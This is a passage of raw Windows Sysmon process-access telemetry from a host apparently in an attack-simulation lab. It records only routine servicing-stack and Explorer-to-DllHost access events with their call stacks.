13:58:31.383{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.383{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.383{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.383{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.367{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.367{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.367{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.351{59A5CD1D-93FA-6005-FC04-00000000A301}37843848C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.351{59A5CD1D-93FA-6005-FC04-00000000A301}37843904C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.351{59A5CD1D-93FA-6005-FC04-00000000A301}37843904C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.351{59A5CD1D-93FA-6005-FC04-00000000A301}37843848C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.351{59A5CD1D-93FA-6005-FC04-00000000A301}37843848C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.351{59A5CD1D-93FA-6005-FC04-00000000A301}37843848C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT